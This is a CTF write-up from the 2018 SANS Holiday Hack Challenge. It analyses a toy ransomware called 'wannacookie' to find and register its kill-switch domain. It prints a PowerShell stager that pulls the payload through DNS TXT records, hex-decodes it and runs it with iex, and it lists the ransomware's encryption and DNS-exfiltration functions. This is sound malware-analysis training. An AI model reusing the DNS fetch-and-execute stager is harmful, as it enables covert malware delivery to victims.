March 14, 2019

Stop the Malware

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

📍 Cookie Recipe document to find killswitch domain, then HoHoHo daddy terminal to register the domain : the terminal is beside the snort terminal.


Unfortunately, Snort alerts show multiple domains, so blocking that one won’t be effective.

I remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.

Perhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!


Ransomware Kill Switches:

I think I remember reading an article recently about Ransomware Kill Switchs. Wouldn’t it be nice if our ransomware had one!


01- Let’s continue analysis of our malware file :

First edit source-1.ps1 and remove iex to prevent running PowerShell file wannacookie.min.ps1 after download:

The code after editing :

function H2A($a) {$o; $a -split ‘(..)’ | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; $f = “77616E6E61636F6F6B69652E6D696E2E707331”; $h = “”; foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server -Name “$” -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server -Name “$i.$” -Type TXT).strings}; iex($(H2A $h | Out-string))

02- Let’s run the modified code and export the result to wannacookie.min.ps1 by adding | out-file wannacookie.min.ps1 at the end of our command :

.\source-1.ps1 | out-file wannacookie.min.ps1

It will take some time wait until finish.

03- Let’s look at wannacookie.min.ps1 :

type .\wannacookie.min.ps1


It’s hard to view here Let’s look at it in Visual Basic Code , open the file in Visual Basic Code and clean it up to get a better view , the file after clean up will look like this:


04- Let’s read the code after we cleaned it:

  • AES Encryption function e_d_file
  • Conversion functions H2B , A2H , H2A , B2H, ti_rox
  • Compression function B2G
  • Decompress function G2B
  • Hashing function sh1
  • Encrypt function using PublicKey p_k_e
  • Encrypt and Decrypt function e_n_d
  • Get using DNS function g_o_dns
  • Split function s_2_c
  • Send using DNS function snd_k
  • The Main function wanc

05- We are looking for kill switch domain like wanna cry malware to stop this ransomware before running , this has to be at the beginning of the main function:

A. Let’s take a look at the first code In main function :


This code line is making request over DNS using $S1 after applying few functions to convert it and compress it then it sent to google dns server , if answer is not null $null -ne continue running the rest of the code , but if answer is null $null than exit the code and stop running.

Also the -ErrorAction 0 option to silently continue even if there is an error .

return means exit the current scope, which can be a function, script, or script block.

Seems this is our kill switch, So we need to figure out what is the dns query name.

B. From previous steps you will notice that malware use DNS request with subdomain in dns query name which refer to what file or message needed , here we have request using this code: 6B696C6C737769746368

C. Let’s decoded From HEX as before:

6B696C6C737769746368 > killswitch

So this confirm that the kill switch domain must be in this code block.

D. Let’s use PowerShell ISE to create separate points and view the data as been transmitted and call functions from the malware script.

E. Run PowerShell ISE and open the file wannacookie.min.ps1, then extract the name query from the script block and add it into new line after $S1 and assign it to $ks the code will be :


Also add stop point after $ks block script to stop the script , then run.

In bottom console write $ks to print out the domain name in dns query :


We found it ! yippeekiyaa.aaay

06- Go to HoHoHo daddy terminal and register the domainyippeekiyaa.aaay” to stop the malware from doing a new infections:




Yippee-Ki-Yay! Now, I have a ma... kill-switch!